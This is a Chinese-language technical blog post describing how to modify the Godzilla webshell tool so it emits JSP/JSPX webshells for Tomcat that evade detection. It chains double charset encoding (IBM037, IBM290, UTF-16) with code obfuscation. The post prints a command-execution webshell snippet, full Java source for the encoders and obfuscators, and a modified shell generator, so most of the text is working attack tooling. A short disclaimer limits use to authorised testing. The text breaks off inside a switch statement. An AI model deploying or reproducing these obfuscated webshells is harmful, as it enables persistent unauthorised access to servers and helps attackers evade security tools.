哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

admin 2024年2月12日00:13:43评论15 views字数 24485阅读81分37秒阅读模式
哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

博大作战中的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

1
前言

该系列文章的前情参考:

哥斯拉Godzilla | 加密器与shell模板二开(上)

哥斯拉Godzilla | 加密器与shell模板二开(下)

本次对上文了解到的架构中,生成木马的代码部分进行再度的学习与分析,从而添加独特的webshell生成方式。

PS:对实现原理不感兴趣的同学可跳到结尾看混淆的效果实现,实现过程的代码均在下方贴出

2
思路来源

1. tomcat混淆

本文中的tomcat混淆大部分思路来源自2022年补天白帽大会yzddMr6师傅的议题 JavaWebshell攻防下的黑魔法y4tracker师傅的博客文章:https://y4tacker.github.io/2022/11/27/year/2022/11/%E6%B5%85%E8%B0%88JspWebshell%E4%B9%8B%E7%BC%96%E7%A0%81/

实现方式为对jspencounter项目进行调用(TIPS:在使用jspencounter时,可能会遇到一些无法判断问题源头的环境,有些文件运行了但没有编码)https://github.com/turn1tup/JspEncounter/tree/main

2. 代码层的混淆

可以参考的文章很多,都比较常见比如:

  • https://tttang.com/archive/1315浅谈JSP Webshell进阶免杀中的数字异或混淆

  • https://blog.csdn.net/2301_80520893/article/details/134554578变量标识符混淆webshell之编码免杀中的unicode、cdata混淆

  • https://tttang.com/archive/1739/ 中的反射免杀(跟上一篇文章提到的shell模板改造类似)

  • 还有一些本次二开没用到的html编码混淆、字节码免杀(编译成class文件后将内容进行base64编码)、自建漏洞(jndi注入、常规反序列化等)免杀、include免杀

3

 本次Godzilla二开希望实现的功能

  • 生成基于tomcat的通杀混淆的webshell

    • IBM290&IBM037(XML声明及内容均进行不同编码)

    • double utf-16le(XML声明及内容均进行相同编码)

    • double ibm037(XML声明及内容均进行相同编码)

    • double utf-16be(XML声明及内容均进行相同编码)

  • 生成基于代码层混淆的webshell

    • unicode

    • 方法名随机

    • 方法的参数名随机

    • 方法体内变量名随机

    • 字符串转byte的形式(new String(new byte[]))

    • 简单的数字XOR处理

4
tomcat通杀混淆技术摘要

方便读者能理解为什么能这么做(编码)以及本次二开实现的基于tomcat木马的通杀混淆方式,故在此会贴出一些议题和文章的内容摘要。

1. 议题中相关知识点摘要

1.1 Tomcat对于编码的解析过程

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

1.2 jspx中各种编码的bom头特征

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

1.3 jsp中显式声明内容编码

除了通过Bom头可以识别的几种内置编码以外,在Jsp中还可以通过标签来显式声明指定的编码,大大扩展了我们可利用编码的范围Jsp中声明编码的四种形式:

  1. <%@ page contentType="charset=cp037" %>

  2. <%@ page pageEncoding="cp037" %>

  3. <jsp:directive.page contentType="charset=cp037"/>

  4. <jsp:directive.page pageEncoding="cp037"/>

1.4 部分可利用的编码

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

1.5 编码的别名问题

一种编码支持多个别名,都可用于webshell的混淆,比如:CP290编码存在多个别名,均可用于表示CP290编码进行内容编码:

  • ibm290

  • ibm-290

  • csIBM290

  • EBCDIC-JP-kana

  • 290

2. 文章中相关知识点摘要

关于tomcat下编码后的代码文件如何被识别:文中“对于这部分处理逻辑其实是由org.apache.jasper.compiler.ParserController#determineSyntaxAndEncoding做处理,在这个类方法当中有两个比较重要的属性isXml与sourceEnc,字面理解就能得出一个判定是否jsp格式是通过xml格式编写,另一个sourceEnc也就决定着jsp文件的编码相关”

2.1 xml格式的声明和识别

xml格式的声明中最主要是标签中的encoding属性,其决定了内容的编码如:<?xml version="1.0" encoding="utf-8" ?> 表示内容以utf-8进行内容编码

识别xml格式的方式 1.根据后缀名.jspx或.tagx (文中说明不作讨论)2.后缀名不符合则根据文本内容是否包含有形如<xxx:root格式的文本,如果有也会识别为一个xml格式

2.2 如何决定一个文件的编码

tomcat这部分的逻辑跟W3C所定义的一致,W3C定义了三条XML解析器如何正确读取XML文件的编码的规则:1.如果文挡有BOM(字节顺序标记),就定义了文件编码2.如果没有BOM,就查看XML encoding声明的编码属性3.如果上述两个都没有,就假定XML文挡采用UTF-8编码

tomcat中,如果有bom头会根据bom头来决定内容的编码,没有bom头会根据文本内容中的pageEncoding进行最终编码

// 根据前4个字节顺序标记判定文件编码的代码在// org.apache.jasper.xmlparser.XMLEncodingDetector#getEncodingNameprivate Object[] getEncodingName(byte[] b4, int count) {    if (count < 2) {        return new Object[]{"UTF-8", null, Boolean.FALSE, Integer.valueOf(0)};    }    int b0 = b4[0] & 0xFF;    int b1 = b4[1] & 0xFF;    if (b0 == 0xFE && b1 == 0xFF) {        return new Object [] {"UTF-16BE", Boolean.TRUE, Integer.valueOf(2)};    }    if (b0 == 0xFF && b1 == 0xFE) {        return new Object [] {"UTF-16LE", Boolean.FALSE, Integer.valueOf(2)};    }   if (count < 3) {          return new Object [] {"UTF-8", null, Boolean.FALSE, Integer.valueOf(0)};      }      int b2 = b4[2] & 0xFF;      if (b0 == 0xEF && b1 == 0xBB && b2 == 0xBF) {          return new Object [] {"UTF-8", null, Integer.valueOf(3)};      }      if (count < 4) {          return new Object [] {"UTF-8", null, Integer.valueOf(0)};      }      int b3 = b4[3] & 0xFF;      if (b0 == 0x00 && b1 == 0x00 && b2 == 0x00 && b3 == 0x3C) {          return new Object [] {"ISO-10646-UCS-4", Boolean.TRUE, Integer.valueOf(4)};      }      if (b0 == 0x3C && b1 == 0x00 && b2 == 0x00 && b3 == 0x00) {          return new Object [] {"ISO-10646-UCS-4", Boolean.FALSE, Integer.valueOf(4)};      }      if (b0 == 0x00 && b1 == 0x00 && b2 == 0x3C && b3 == 0x00) {          return new Object [] {"ISO-10646-UCS-4", null, Integer.valueOf(4)};      }      if (b0 == 0x00 && b1 == 0x3C && b2 == 0x00 && b3 == 0x00) {          return new Object [] {"ISO-10646-UCS-4", null, Integer.valueOf(4)};      }      if (b0 == 0x00 && b1 == 0x3C && b2 == 0x00 && b3 == 0x3F) {          return new Object [] {"UTF-16BE", Boolean.TRUE, Integer.valueOf(4)};      }      if (b0 == 0x3C && b1 == 0x00 && b2 == 0x3F && b3 == 0x00) {          return new Object [] {"UTF-16LE", Boolean.FALSE, Integer.valueOf(4)};      }      if (b0 == 0x4C && b1 == 0x6F && b2 == 0xA7 && b3 == 0x94) {          return new Object [] {"CP037", null, Integer.valueOf(4)};      }      return new Object [] {"UTF-8", null, Boolean.FALSE, Integer.valueOf(0)};  }

2.3 tomcat webshell的双编码避坑

根据xml格式的encoding属性可以决定内容的编码,根据bom头也可以决定内容的编码,所以实现双编码的tomcat webshell是可行的。文中写到:tomcat8.0.50中对应着UTF-8UTF-16BEUTF-16LEISO-10646-UCS-4CP037作为前置编码,当然后置就无所谓,基本上java中的都行

双编码存在坑点,坑点文章中已写出:以前置cp037+后置utf-16为例,以下代码输出长度为41

a0 = '''<?xml version="1.0" encoding='utf-16be'?>'''print(len(a0.encode("cp037")))

由于前面进行了cp037编码为单数,对于utf-16是相当于两个字节去解码,所以最终无法识别<xxx:root代码片段,那就程序就会认为这不是一个xml格式的写法。

2.4 tomcat webshell的三重编码的方式

  1. 保证无法通过BOM识别出文本内容编码(保证isBomPresent为false)

  2. 通过<?xml encoding='xxx'可以控制sourceEnc的值

  3. 将标签<jsp:directive.或<%@放置在全文任意位置但不影响代码解析

  4. 通过标签<jsp:directive.或<%@的pageEncoding属性再次更改文本内容编码

例子:

a0 = '''<?xml version="1.0" encoding='cp037'?>'''a1 = '''<%    Process p = Runtime.getRuntime().exec(request.getParameter("y4tacker"));    java.io.BufferedReader input = new java.io.BufferedReader(new java.io.InputStreamReader(p.getInputStream()));    String line = "'''a2 = '''<%@ page pageEncoding="UTF-16BE"%>'''a3 = '''";    while ((line = input.readLine()) != null) {        out.write(line+"\n");    }%>'''with open("test3.jsp","wb") as f:    f.write(a0.encode("utf-8"))    f.write(a1.encode("utf-16be"))    f.write(a2.encode("cp037"))    f.write(a3.encode("utf-16be"))

3.用于二开的tomcat编码混淆技术摘要总结

  1. Jdk8+Tomcat8.5下支持900+种编码,可用于混淆webshell的有十余种

  2. 可以用编码的别名,达到的编码效果是等效的

  3. tomcat8下,如果有bom头会根据bom头来决定内容的编码(即:需要在文件内容前面插入对应编码的bom头,以便程序能识别到bom头,找到对应编码),没有bom头会根据文本内容中的pageEncoding进行最终编码

  4. 可以进行双编码:XML声明头来指定shell内容的编码,对XML声明头也进行编码。(本次二开没探索更多的三重编码)

5
jspencounter项目中在本次用到的部分代码实现

具体代码逻辑见注释处

//用于内容编码的函数代码public static byte[] Encode(String text, String charset, boolean removeBom) throws Exception {     if (text != null && text.length() != 0) {         Charset charset1 = Charset.forName(charset);         byte[] result = null;         ByteArrayOutputStream outputStream = new ByteArrayOutputStream();         Constructor<?> c = Utils.GetClass("sun.nio.cs.StreamEncoder").getDeclaredConstructor(OutputStream.class, Object.class, Charset.class);         c.setAccessible(true);         Writer streamEncoder = (Writer)c.newInstance(outputStream, "LOCK", charset1);//如果不移除bom头,则根据需要编码的类型,进行插入bom头//具体为什么要这么插入bom头,可回看2.2.2中的org.apache.jasper.xmlparser.XMLEncodingDetector#getEncodingName代码(即:为了让tomcat识别到bom,以确定内容是什么编码)         if (!removeBom) {             if (StandardCharsets.UTF_16BE == charset1) {                 outputStream.write(254);                 outputStream.write(255);             } else if (StandardCharsets.UTF_16LE == charset1) {                 outputStream.write(255);                 outputStream.write(254);             } else if (StandardCharsets.UTF_8 == charset1) {                 outputStream.write(239);                 outputStream.write(187);                 outputStream.write(191);             }         }//创建一个ByteBuffer,记录当前写入的指针指向,以便根据是否需要移除bom,对shell内容进行操作//即:需要bom头,则在插入bom头后,插入指定的编码后的shell内容。不需要bom头时,直接对shell内容进行编码即可。         streamEncoder.write(text.substring(0, 1));         ByteBuffer bb = (ByteBuffer)Utils.GetFieldValue("sun.nio.cs.StreamEncoder", "bb", streamEncoder);         int bomSize = bb.position();         if (removeBom) {             streamEncoder.write(text);         } else {             streamEncoder.write(text.substring(1));         }         streamEncoder.close();         outputStream.close();         byte[] result = outputStream.toByteArray();         if (removeBom) {             result = Arrays.copyOfRange(result, bomSize, result.length);         }         return result;     } else {         return null;     } }//根据表达式,匹配shell的内容(在本文中,作用是将指定文本分离为全局代码块和通讯代码块)public static Pair<Integer, List<String>> LoopMatch(String text, String reg, int f) {     List<String> results = null;     int end = 0;     while(true) {     Matcher mTmp = Pattern.compile(reg, f).matcher(text);     if (!mTmp.find()) {         if (results == null) {             return null;         }         return new ImmutablePair(end, results);     }     if (results == null) {         results = new ArrayList();     }     for(int i = 1; i < mTmp.groupCount() + 1; ++i) {         results.add(mTmp.group(i));     }     end += mTmp.end();     text = text.substring(mTmp.end()); }  }//分离jspx的全局代码块和通讯代码块public static JspBean TranslateToBeanEx_jspx(String src) {     JspBean bean = new JspBean();     String regexDeclaration = "<jsp:declaration>\s*(.*?)\s*</jsp:declaration>";     String regexScriptlet = "<jsp:scriptlet>\s*(.*?)\s*</jsp:scriptlet>";      Pair<Integer, List<String>> decs = LoopMatch(src, regexDeclaration, Pattern.DOTALL);     if (decs != null) {         bean.setDeclarations(decs.getRight());     }     Pair<Integer, List<String>> scripts = LoopMatch(src, regexScriptlet, Pattern.DOTALL);     if (scripts != null) {         bean.setScriptlets(scripts.getRight());     }     return bean;  }    //分离jsp的全局代码块和通讯代码块public static JspBean TranslateToBeanEx(String src) {     JspBean bean = new JspBean();     String regexPage = "<%\s*@\s*page\s*(.*?)%>";     String regexDeclaration = "<%!\s*(.*?)%>";     String regexExpr = "<%=\s*(.*?)%>";     String regexScriptlet = "<%(?!\!)\s*(.*?)%>";     String regexAttrs = "\s*(.*?)=["](.*?[^\\])["]";     Pair<Integer, List<String>> pages = LoopMatch(src, regexPage, Pattern.DOTALL);     if (pages != null) {         for (String attrsTxt : pages.getRight()) {             Map<String, String> kvM = AttrsToMap(attrsTxt, regexAttrs);             if (kvM == null) {                 continue;             }             bean.addPage(kvM);         }     }     Pair<Integer, List<String>> decs = LoopMatch(src, regexDeclaration, Pattern.DOTALL);     if (decs != null) {         bean.setDeclarations(decs.getRight());     }     Pair<Integer, List<String>> exprs = LoopMatch(src, regexExpr, Pattern.DOTALL);     if (exprs != null) {         bean.setExpressions(exprs.getRight());     }     Pair<Integer, List<String>> scripts = LoopMatch(src, regexScriptlet, Pattern.DOTALL);     if (scripts != null) {         bean.setScriptlets(scripts.getRight());     }     return bean; }
6
主动调用jspencounter中的编码函数进行编码测试

 1 只使用bom头的方式进行UTF-16BE内容编码

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

通过主动调用jspencounter中的Encode函数,并且不去除bom头,选择UTF-16BE内容编码,会明显发现,编码后的5.jsp比原文件4.jsp的文件大小要大一倍

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

原文件和编码后的文件,使用sublime工具打开,如下图(可以看到编码后的shell内容还是可见的):

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

010editor打开5.jsp查看二进制数据:

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

上传tomcat可以解析

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

2 IBM290&IBM037双重编码的测试

测试了一下只使用bom头的方式进行IBM037编码,在没有XML声明头的情况下,像5.1那样,插入IBM037的bom头,然后内容进行IBM037编码,并不可以,需要有XML声明头给程序进行XML格式识别

//xml声明头采用IBM037编码,shell内容采用IBM290编码。代码实现如下:public static byte[] tomcat_jsp_IBM290(byte[] data) throws Exception {     byte[] header = "<?xml version="1.0" encoding='IBM290'?>".getBytes();//用X加密头标签     InputStream header_inputStream = new ByteArrayInputStream(header);     String header_str = IOUtils.toString(header_inputStream, StandardCharsets.UTF_8);     byte[] header_enc_byte_res = CharsetEncoder.Encode(header_str, "IBM037", true);     InputStream inputStream = new ByteArrayInputStream(data);     String shell_str = IOUtils.toString(inputStream, StandardCharsets.UTF_8);     byte[] enc_byte_res = CharsetEncoder.Encode(shell_str, "IBM290", true);     byte[] final_byte = new byte[header_enc_byte_res.length+enc_byte_res.length];     System.arraycopy(header_enc_byte_res, 0, final_byte, 0, header_enc_byte_res.length);     System.arraycopy(enc_byte_res, 0, final_byte, header_enc_byte_res.length, enc_byte_res.length);     return final_byte; }

生成的12.jsp双重编码的马子,二进制和文本格式如下:

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

webshell混淆效果如下

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

tomcat8能成功解析,并且godzilla能成功连接:

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

7
shell内容单/双重编码的代码实现

以下的编码代码,均可对xml格式的jsp马进行单/双重编码,并且在tomcat8下能正常解析和shell连接

引入了jspencounter项目的相关函数

//ibm037&ibm290public static byte[] tomcat_jsp_IBM290(byte[] data) throws Exception {     byte[] header = "<?xml version="1.0" encoding='IBM290'?>".getBytes();     InputStream header_inputStream = new ByteArrayInputStream(header);     String header_str = IOUtils.toString(header_inputStream, StandardCharsets.UTF_8);     byte[] header_enc_byte_res = CharsetEncoder.Encode(header_str, "IBM037", true);     InputStream inputStream = new ByteArrayInputStream(data);     String shell_str = IOUtils.toString(inputStream, StandardCharsets.UTF_8);     byte[] enc_byte_res = CharsetEncoder.Encode(shell_str, "IBM290", true);     byte[] final_byte = new byte[header_enc_byte_res.length+enc_byte_res.length];     System.arraycopy(header_enc_byte_res, 0, final_byte, 0, header_enc_byte_res.length);     System.arraycopy(enc_byte_res, 0, final_byte, header_enc_byte_res.length, enc_byte_res.length);     return final_byte; }//double ibm037public static byte[] tomcat_jsp_IBM037(byte[] data) throws Exception {     byte[] header = "<?xml version="1.0" encoding='IBM037'?>".getBytes();     InputStream header_inputStream = new ByteArrayInputStream(header);     String header_str = IOUtils.toString(header_inputStream, StandardCharsets.UTF_8);     byte[] header_enc_byte_res = CharsetEncoder.Encode(header_str, "IBM037", true);     InputStream inputStream = new ByteArrayInputStream(data);     String shell_str = IOUtils.toString(inputStream, StandardCharsets.UTF_8);     byte[] enc_byte_res = CharsetEncoder.Encode(shell_str, "IBM037", true);     byte[] final_byte = new byte[header_enc_byte_res.length+enc_byte_res.length];     System.arraycopy(header_enc_byte_res, 0, final_byte, 0, header_enc_byte_res.length);     System.arraycopy(enc_byte_res, 0, final_byte, header_enc_byte_res.length, enc_byte_res.length);     return final_byte; }//double utf-16lepublic static byte[] tomcat_jsp_UTF_16LE(byte[] data) throws Exception {     byte[] header = "<?xml version="1.0" encoding='UTF-16LE'?>".getBytes();     InputStream header_inputStream = new ByteArrayInputStream(header);     String header_str = IOUtils.toString(header_inputStream, StandardCharsets.UTF_8);     byte[] header_enc_byte_res = CharsetEncoder.Encode(header_str, "UTF-16LE", true);     InputStream inputStream = new ByteArrayInputStream(data);     String shell_str = IOUtils.toString(inputStream, StandardCharsets.UTF_8);     byte[] enc_byte_res = CharsetEncoder.Encode(shell_str, "UTF-16LE", true);     byte[] final_byte = new byte[header_enc_byte_res.length+enc_byte_res.length];     System.arraycopy(header_enc_byte_res, 0, final_byte, 0, header_enc_byte_res.length);     System.arraycopy(enc_byte_res, 0, final_byte, header_enc_byte_res.length, enc_byte_res.length);     return final_byte; }//double utf-16bepublic static byte[] tomcat_jsp_UTF_16BE(byte[] data) throws Exception {     byte[] header = "<?xml version="1.0" encoding='UTF-16BE'?>".getBytes();     InputStream header_inputStream = new ByteArrayInputStream(header);     String header_str = IOUtils.toString(header_inputStream, StandardCharsets.UTF_8);     byte[] header_enc_byte_res = CharsetEncoder.Encode(header_str, "UTF-16BE", true);     InputStream inputStream = new ByteArrayInputStream(data);     String shell_str = IOUtils.toString(inputStream, StandardCharsets.UTF_8);     byte[] enc_byte_res = CharsetEncoder.Encode(shell_str, "UTF-16BE", true);     byte[] final_byte = new byte[header_enc_byte_res.length+enc_byte_res.length];     System.arraycopy(header_enc_byte_res, 0, final_byte, 0, header_enc_byte_res.length);     System.arraycopy(enc_byte_res, 0, final_byte, header_enc_byte_res.length, enc_byte_res.length);     return final_byte; }
8
代码层混淆的代码实现

具体代码逻辑见注释处

//混淆的处理逻辑拼接public static String string_do_obf(String code){     String final_code = "";     boolean is_jspx = false;     String globalCode = null;     String job_code = null;     //code中存在declaration则为jspx否则为jsp <%! %>     if(code.contains("declaration")){is_jspx=true;}     String[] split_code = split_by_tag(code,is_jspx);     globalCode = split_code[0];     job_code = split_code[1];     String dojob_code = do_code_job(globalCode,job_code,is_jspx);     final_code = dojob_code;     return final_code; }//结构体字符串列表拼接public static String concatenateStrings(List<String> strings) {     StringBuilder stringBuilder = new StringBuilder();     for (String str : strings) {         stringBuilder.append(str);     }     return stringBuilder.toString(); }//cdata混淆public static String WrapWithCdata(String text, int cap) {     if (cap < 0 || text.length() <= cap) {         return "<![CDATA[" + text + "]]>";     }      int turn = (int) Math.ceil((float) text.length() / (float) cap); StringBuilder sb = new StringBuilder(); for (int i = 0; i < turn; i++) {     int start = i * cap;     sb.append("<![CDATA[");     if (i == turn - 1) {         sb.append(text.substring(start));     } else {         sb.append(text.substring(start, start + cap));     }     sb.append("]]>"); } return sb.toString();  }//给定jsp或者jspx的内容,将内容分为全局代码块和通讯代码块(解析文件结构体)public static String[] split_by_tag(String code,boolean is_jspx){     String declaration = null;     String scriptlet = null;     JspBean jspBean = new JspBean();     if(is_jspx){         JspBean bean_jspx = TranslateToBeanEx_jspx(code);         if (bean_jspx.getDeclarations() != null)             declaration = concatenateStrings(bean_jspx.getDeclarations());         if (bean_jspx.getScriptlets() != null)             scriptlet = concatenateStrings(bean_jspx.getScriptlets());     }else{     JspBean bean = TranslateToBeanEx(code);     if (bean.getDeclarations() != null)         declaration = concatenateStrings(bean.getDeclarations());     if (bean.getScriptlets() != null)         scriptlet = concatenateStrings(bean.getScriptlets());     }     return new String[]{declaration,scriptlet}; }//处理全局代码块和通讯代码块的混淆逻辑public static String do_code_job(String globalcode,String code,boolean is_jspx){     String final_globalCode = globalcode;     String final_job_code = code;     String final_code = null;//将全局代码块和通讯代码块,通过硬拼接的方式(代码比较粗糙,仅供参考),使得代码块符合ast格式,方便转换为CompilationUnit对象。然后可以更方便的遍历所有方法、参数、变量名等属性,进行混淆。//所有数字做三次XOR混淆、重命名每个方法内的变量(变量名为随机),重命名每个方法名(方法名为随机),重命名方法的参数(参数名为随机)     final_globalCode = "public class test1{"+ final_globalCode + "}";//让globalcode变成符合ast格式     CompilationUnit compilationUnit1 = StaticJavaParser.parse(final_globalCode);     convertStringsToByteArrays(compilationUnit1);     List<MethodDeclaration> methods1 = compilationUnit1.findAll(MethodDeclaration.class);     for (MethodDeclaration method : methods1) {         //对每个方法的变量名混淆         renameVariables(method);         //对每个方法进行XOR         doXOR(method);         doXOR(method);         doXOR(method);     }     String modifiedCode1 = compilationUnit1.toString();     int lastIndex = modifiedCode1.lastIndexOf("}");     final_globalCode = modifiedCode1.substring(24,lastIndex);     final_globalCode = removeInvisibleChars(final_globalCode).replaceAll("\s{2,}", "");     //处理code代码块     final_job_code = "public class test1{public void test2(){"+final_job_code+"}}";     CompilationUnit compilationUnit = StaticJavaParser.parse(final_job_code);     convertStringsToByteArrays(compilationUnit);     MethodDeclaration test1_method = compilationUnit.findFirst(MethodDeclaration.class,                     method -> method.getName().getIdentifier().equals("test2"))             .orElse(null);     if (test1_method != null) {         renameVariables(test1_method);         doXOR(test1_method);         doXOR(test1_method);         doXOR(test1_method);         final_job_code = test1_method.toString();     }     int lastIndex2 = final_job_code.lastIndexOf("}");     final_job_code = final_job_code.substring(25,lastIndex2);     final_job_code = removeInvisibleChars(final_job_code).replaceAll("\s{2,}", "");//根据jsp/jspx对最终代码进行拼接     if(is_jspx){//进行cdata混淆         final_globalCode = WrapWithCdata(final_globalCode,10);         final_job_code = WrapWithCdata(final_job_code,10);         final_code = "<jsp:root xmlns:jsp="[http://java.sun.com/JSP/Page"](http://java.sun.com/JSP/Page") version="1.2"><jsp:declaration>n" + final_globalCode + "n</jsp:declaration><jsp:scriptlet>n" + final_job_code + "n</jsp:scriptlet><jsp:text></jsp:text></jsp:root>";     }else{         final_code = "<%!n" + final_globalCode + "n%>n<%n" + final_job_code +"n%>";     }     return final_code; }//重命名方法体内的参数名、变量名为随机字符串public static MethodDeclaration renameVariables(MethodDeclaration method) {     // 创建名字映射表     Map<String, String> nameMapping = new HashMap<>();     // 重命名方法参数     for (Parameter parameter : method.getParameters()) {         String oldName = parameter.getNameAsString();         String newName = getRandomUniqueString(20, nameMapping);         nameMapping.put(oldName, newName);         parameter.setName(newName);     }     // 重命名方法内的变量     method.accept(new VoidVisitorAdapter<Void>() {         @Override         public void visit(VariableDeclarator declarator, Void arg) {             String oldName = declarator.getNameAsString();             String newName = getRandomUniqueString(20, nameMapping);             nameMapping.put(oldName, newName);             declarator.setName(newName);             super.visit(declarator, arg);         }     }, null);      // 遍历方法内的代码并替换名称 method.accept(new VoidVisitorAdapter<Void>() {     @Override     public void visit(NameExpr nameExpr, Void arg) {         String oldName = nameExpr.getNameAsString();         String newName = nameMapping.get(oldName);         if (newName != null) {             nameExpr.setName(newName);         }         super.visit(nameExpr, arg);     } }, null); return method;  }//获取指定长度的随机字符串public static String getRandomString(int length) {     try {         //Thread.sleep(1000);         String str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";         Random random = new Random();         random.setSeed(System.currentTimeMillis());         StringBuilder sb = new StringBuilder();         for (int i = 0; i < length; i++) {             int number = random.nextInt(52);             sb.append(str.charAt(number));         }         return sb.toString();     }catch (Exception e){         e.printStackTrace();         return null;     } }//getRandomUniqueString函数是为了避免方法内需要混淆的变量/参数名发生重名而导致程序报错public static String getRandomUniqueString(int length, Map<String, String> existingNames) {     String newName;     do {         newName = getRandomString(length);     } while (existingNames.containsValue(newName));     return newName; }//对方法体内的数值进行异或混淆public static void doXOR(MethodDeclaration method){     Random random = new Random();     random.setSeed(System.currentTimeMillis());     List<IntegerLiteralExpr> integers = method.findAll(IntegerLiteralExpr.class);     for (IntegerLiteralExpr i : integers) {         int value = Integer.parseInt(i.getValue());         int key = random.nextInt(1000000) + 1000000;         int cipherNum = value ^ key;         EnclosedExpr enclosedExpr = new EnclosedExpr();         BinaryExpr binaryExpr = new BinaryExpr();         binaryExpr.setLeft(new IntegerLiteralExpr(String.valueOf(cipherNum)));         binaryExpr.setRight(new IntegerLiteralExpr(String.valueOf(key)));         binaryExpr.setOperator(BinaryExpr.Operator.XOR);         enclosedExpr.setInner(binaryExpr);         i.replace(enclosedExpr);     } }//删除换行符和不可见字符public static String removeInvisibleChars(String input) {     // 定义正则表达式,匹配不可见字符和换行符     String regex = "\p{C}|\r|\n";     Pattern pattern = Pattern.compile(regex);     Matcher matcher = pattern.matcher(input);     // 使用空字符串替换匹配到的字符     String cleanedString = matcher.replaceAll("");     return cleanedString;      }//字符串转为表达式public static Expression parseExpression(String expression) {     return StaticJavaParser.parseExpression(expression); }//将原始字符串转换为以new String(new byte[]{字符串的byte形式})的格式来替换public static void convertStringsToByteArrays(CompilationUnit cu) {     cu.findAll(StringLiteralExpr.class).forEach(stringLiteral -> {         String value = stringLiteral.getValue();         String bytes = convertStringToBytes(value);         if (!bytes.isEmpty()) {             // 创建一个新的 Expression 对象,表示 new String(new byte[]{...})             Expression byteArrayExpr = parseExpression("new String(new byte[] {" + bytes + "})");             // 将原始字符串节点替换为新的表达式节点             stringLiteral.replace(byteArrayExpr);         }     }); }//字符串转为byte的形式 public static String convertStringToBytes(String str) {     StringBuilder bytes = new StringBuilder();     for (char c : str.toCharArray()) {         if (bytes.length() > 0) {             bytes.append(", ");         }         bytes.append((int) c);     }     return bytes.toString(); }
9
Godzilla中JAVA_RSA加密器的生成木马逻辑代码修改

 也就是将第2点提到的功能应用到Godzilla中JAVA_RSA加密器的生成木马逻辑中(代码逻辑比较简陋粗糙)

//修改后的JAVA_RSA加密器的Generate类的代码如下:package shells.cryptions.JavaRSA;import core.ApplicationContext;import core.ui.component.dialog.GOptionPane;import java.io.InputStream;import util.Log;import util.functions;class Generate{private static final String[] SUFFIX = new String[] { "jsp","jsp_obf","jsp_unicode", "tomcat_jsp_IBM037","tomcat_jsp_IBM290","tomcat_jsp_UTF_16BE","tomcat_jsp_UTF_16LE","jspx","jspx_unicode","jspx_double_ibm037" };Generate() {}public static byte[] GenerateShellLoder(String shellName, String pass, String secretKey, boolean isBin) throws Exception { byte[] data = null; String temp_suffix = ""; try {   InputStream inputStream = Generate.class.getResourceAsStream("template/" + shellName + "raw" + "GlobalCode_new.bin");   String globalCode = new String(functions.readInputStream(inputStream));   inputStream.close();   globalCode = globalCode.replace("{pass}", pass).replace("{secretKey}", secretKey);   inputStream = Generate.class.getResourceAsStream("template/" + shellName + "raw" + "Code_new.bin");   String code = new String(functions.readInputStream(inputStream));   inputStream.close();   Object selectedValue = GOptionPane.showInputDialog(null, "suffix", "selected suffix", 1, null, (Object[])SUFFIX, null);   if (selectedValue != null) {     String suffix = (String)selectedValue;     //temp_suffix用于调用指定插件方法     temp_suffix = suffix;     if (suffix.contains("tomcat_jsp_")||suffix.contains("jsp_obf")){suffix = "jsp_obf";}else if(suffix.contains("jsp_")){suffix = "jsp";}else if(suffix.contains("jspx")){suffix="jspx";}     inputStream = Generate.class.getResourceAsStream("template/shell." + suffix);     String template = new String(functions.readInputStream(inputStream));     inputStream.close();     if (ApplicationContext.isGodMode()) {       template = template.replace("{globalCode}", functions.stringToUnicode(globalCode)).replace("{code}", functions.stringToUnicode(code));     }else if(temp_suffix=="jsp_unicode"||temp_suffix=="jspx_unicode"){       template = template.replace("{globalCode}", functions.stringToUnicode(globalCode)).replace("{code}", functions.stringToUnicode(code));     } else {       //如果选择为jspx格式的马子并且需要马子的原始代码,则需要对<>&符号进行处理,以使得马子能正常运行       if(template.contains("declaration")&&temp_suffix=="jspx"){         globalCode = globalCode.replace("&","&amp;").replace("<", "&lt;").replace(">", "&gt;");         code = code.replace("&","&amp;").replace("<", "&lt;").replace(">", "&gt;");       }       template = template.replace("{globalCode}", globalCode).replace("{code}", code);     }//到这里,完成模版与代码块的结合     if(temp_suffix.contains("jsp_obf")){       template = shells.encoder.java.another_encode.string_do_obf(template);     }     data = template.getBytes();   } } catch (Exception e) {   Log.error(e); } //第一个if专门用于混淆jsp的代码,只要不为空就进入。比如temp_suffix即使为jspx也进入,因为它无法进入到下面的switch case中 if(temp_suffix!=""){   switch(temp_suffix) {     case "tomcat_jsp_IBM037":       data = shells.encoder.java.jspencounter.tomcat_jsp_IBM037(data);       break;     case "tomcat_jsp_IBM290":       data = shells.encoder.java.jspencounter.tomcat_jsp_IBM290(data);       break;     case "tomcat_jsp_UTF_16BE":       data = shells.encoder.java.jspencounter.tomcat_jsp_UTF_16BE(data);       break;     case "tomcat_jsp_UTF_16LE":       data = shells.encoder.java.jspencounter.tomcat_jsp_UTF_16LE(data);       break;     case "jspx_double_ibm037":       data = shells.encoder.java.jspencounter.jspx_doubule_ibm037(data);       break;   